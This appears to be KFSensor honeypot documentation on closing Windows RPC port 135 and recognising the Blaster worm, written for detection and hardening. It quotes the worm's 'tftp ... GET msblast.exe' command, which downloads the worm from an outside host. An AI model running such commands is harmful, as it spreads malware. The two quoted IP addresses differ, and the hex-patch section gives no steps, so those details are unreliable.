MS RPC, port 135, DCOM buffer overrun and the Blaster wormMicrosoft's RPC implementation runs over TCP port 135.
RPC is used by a number of higher level protocols for their transport layer, such as by DCOM.
Vulnerabilities have been found in Microsoft's RPC implementation and the services it gives access to.
Closing TCP port 135
It is highly desirable to close port 135 and to allow KFSensor to listen to it. Port 135 is consistently on of the most attacked ports on the Internet.
It is not possible to simply disable the RPC service as there are many essential parts of Windows that require RPC to be running even though they do not make network connections.
However Microsoft does not allow RPC to configured to a different port and by default it is bound to all network interfaces making it vulnerable to attack from the Internet.
The following sections describe how to disable services that run on top of RPC, which is desirable in itself, and then to close port 135 itself.
Disable RPC dependent servicesSeveral non-essential services use RPC and these should be disabled.
Shutdown and disable the following services in the services console.
SSDP Discovery Service
System Event Notification
Remote Desktop Help Session Manager
Distributed Transaction Coordinator
Task Scheduler service
COM+ Event System
COM+ System Application
Windows DCOM allows applications to share COM functionality over a TCP/IP network. Only a few applications have ever used DCOM and it is due to be phased out by Microsoft. This functionality is turned on by default and uses RPC.
It is possible to reconfigure MS RPC to make it safer using a Microsoft configuration tool rpccfg.
To obtain this tool go to www.microsoft.com and enter rpccfg into their site search and download it from the link.
The idea is to get RPC to only bind to the loopback address.
After performing the above re-boot the machine.
If all the RPC using services have been closed down then port 135 should now be closed and KFSensor will be able to use it.
Patching the RPC server
This technique is suitable for Windows XP and 2003 only. Later version of Windows contain a feature that will recognize when system files have been changed and will repair them automatically and thus overwrite the patch.
Microsoft RPC cannot be configured not to listen on a different port to 135.
The server needs to be patched using a hex editor.
The RPC server is implemented in a file called rpcss.dll, however this file is in constant use.
On the 16 July 2003 Microsoft released a patch to fix a buffer overrun in its Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface.
On the 11 August 2003 a new worm ('Blaster') was detected which exploited this vulnerability and rapidly infected large numbers of unpatched machines.
The Blaster worm attacks a Windows machine by first executing a buffer overrun at port 135 TCP. This causes a vulnerable machine to listen to port 4444 TCP and execute the following command "tftp -i 18.104.22.168 GET msblast.exe". This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues.
You can find a full description of the Blaster worm here:
If attacked by the Blaster worm you will see the following two events in quick succession.
1. Port 135Received 1776 bytes containing the binary buffer overrun.
2. Port 4444Containing the following text:
tftp -i 22.214.171.124 GET msblast.exe